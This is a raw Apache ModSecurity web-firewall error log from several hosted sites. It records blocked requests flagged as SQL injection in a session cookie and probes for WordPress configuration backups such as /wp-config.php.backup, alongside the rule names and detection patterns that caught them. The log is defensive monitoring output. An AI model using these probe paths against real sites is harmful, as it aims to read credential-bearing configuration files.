[Tue May 12 03:40:51.839577 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFI7vMumyrWMfSu7q5KQAAANM"]
[Tue May 12 03:40:51.839778 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFI7vMumyrWMfSu7q5KQAAANM"]
[Tue May 12 03:40:52.428469 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKFI7vMumyrWMfSu7q5KQAAANM"]
[Tue May 12 03:40:52.855162 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:35790] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/site"] [unique_id "agKFJFfdQaraX_prmqcugQAAAA8"]
[Tue May 12 03:40:52.855385 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:35790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/site"] [unique_id "agKFJFfdQaraX_prmqcugQAAAA8"]
[Tue May 12 03:40:52.855609 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:35790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFJFfdQaraX_prmqcugQAAAA8"]
[Tue May 12 03:40:53.168479 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFJbvMumyrWMfSu7q5KwAAANM"]
[Tue May 12 03:40:53.168688 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFJbvMumyrWMfSu7q5KwAAANM"]
[Tue May 12 03:40:54.429993 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:42564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKFJbvMumyrWMfSu7q5KwAAANM"]
[Tue May 12 03:41:57.462693 2026] [security2:error] [pid 1695975:tid 1695997] [client 43.165.127.225:50702] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKFZdVI9ymHBxup74-a6gAAAJM"]
[Tue May 12 03:42:04.729931 2026] [security2:error] [pid 1709071:tid 1709102] [client 43.164.192.151:48450] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/"] [unique_id "agKFbLvMumyrWMfSu7q5egAAAM8"], referer: http://apoe.fr
[Tue May 12 03:42:36.338299 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/wp-config.php.backup"] [unique_id "agKFjNVI9ymHBxup74-bGgAAAIQ"]
[Tue May 12 03:42:36.338474 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/wp-config.php.backup"] [unique_id "agKFjNVI9ymHBxup74-bGgAAAIQ"]
[Tue May 12 03:42:37.702870 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agKFjNVI9ymHBxup74-bGgAAAIQ"]
[Tue May 12 03:43:01.323297 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/backup.wp-config.php"] [unique_id "agKFpdVI9ymHBxup74-bRgAAAIQ"]
[Tue May 12 03:43:01.323440 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/backup.wp-config.php"] [unique_id "agKFpdVI9ymHBxup74-bRgAAAIQ"]
[Tue May 12 03:43:02.623077 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agKFpdVI9ymHBxup74-bRgAAAIQ"]
[Tue May 12 03:43:03.108765 2026] [security2:error] [pid 1730175:tid 1730191] [client 172.104.186.23:46716] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/cms"] [unique_id "agKFp3o6NvB9WXx5V-6KzAAAAQ4"]
[Tue May 12 03:43:03.108974 2026] [security2:error] [pid 1730175:tid 1730191] [client 172.104.186.23:46716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/cms"] [unique_id "agKFp3o6NvB9WXx5V-6KzAAAAQ4"]
[Tue May 12 03:43:03.109189 2026] [security2:error] [pid 1730175:tid 1730191] [client 172.104.186.23:46716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFp3o6NvB9WXx5V-6KzAAAAQ4"]
[Tue May 12 03:43:10.574385 2026] [:error] [pid 1691274:tid 1691297] [client 71.62.174.126:47473] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 03:43:25.028263 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.104.186.23:59208] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFvTue9Sp-pIv_Bb6gYgAAAUc"]
[Tue May 12 03:43:25.028481 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.104.186.23:59208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFvTue9Sp-pIv_Bb6gYgAAAUc"]
[Tue May 12 03:43:26.227794 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.104.186.23:59208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKFvTue9Sp-pIv_Bb6gYgAAAUc"]
[Tue May 12 03:43:30.042369 2026] [security2:error] [pid 1695975:tid 1695994] [client 172.104.186.23:43394] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/new"] [unique_id "agKFwtVI9ymHBxup74-bcgAAAJA"]
[Tue May 12 03:43:30.042587 2026] [security2:error] [pid 1695975:tid 1695994] [client 172.104.186.23:43394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/new"] [unique_id "agKFwtVI9ymHBxup74-bcgAAAJA"]
[Tue May 12 03:43:30.042791 2026] [security2:error] [pid 1695975:tid 1695994] [client 172.104.186.23:43394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFwtVI9ymHBxup74-bcgAAAJA"]
[Tue May 12 03:43:35.348829 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/new-wp-config.php"] [unique_id "agKFx9VI9ymHBxup74-bdgAAAIQ"]
[Tue May 12 03:43:35.348985 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/new-wp-config.php"] [unique_id "agKFx9VI9ymHBxup74-bdgAAAIQ"]
[Tue May 12 03:43:36.517879 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.212.217.10:30905] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agKFx9VI9ymHBxup74-bdgAAAIQ"]
[Tue May 12 03:43:40.673378 2026] [security2:error] [pid 1709071:tid 1709098] [client 172.104.186.23:49550] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFzLvMumyrWMfSu7q51QAAAMs"]
[Tue May 12 03:43:40.673587 2026] [security2:error] [pid 1709071:tid 1709098] [client 172.104.186.23:49550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKFzLvMumyrWMfSu7q51QAAAMs"]
[Tue May 12 03:43:41.262060 2026] [security2:error] [pid 1709071:tid 1709098] [client 172.104.186.23:49550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKFzLvMumyrWMfSu7q51QAAAMs"]
[Tue May 12 03:43:46.357972 2026] [security2:error] [pid 1707624:tid 1707704] [client 172.104.186.23:39734] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/old"] [unique_id "agKF0rOxS7i6i_mT2NLZggAAAFY"]
[Tue May 12 03:43:46.358184 2026] [security2:error] [pid 1707624:tid 1707704] [client 172.104.186.23:39734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/old"] [unique_id "agKF0rOxS7i6i_mT2NLZggAAAFY"]
[Tue May 12 03:43:46.358418 2026] [security2:error] [pid 1707624:tid 1707704] [client 172.104.186.23:39734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKF0rOxS7i6i_mT2NLZggAAAFY"]
[Tue May 12 03:44:24.675338 2026] [security2:error] [pid 1691274:tid 1691298] [client 43.166.242.189:46794] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "domaine-de-janasse.com"] [uri "/"] [unique_id "agKF-FfdQaraX_prmqcvaAAAABc"]
[Tue May 12 03:44:42.870631 2026] [security2:error] [pid 1709071:tid 1709098] [client 172.104.186.23:46192] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGCrvMumyrWMfSu7q6BQAAAMs"]
[Tue May 12 03:44:42.870832 2026] [security2:error] [pid 1709071:tid 1709098] [client 172.104.186.23:46192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGCrvMumyrWMfSu7q6BQAAAMs"]
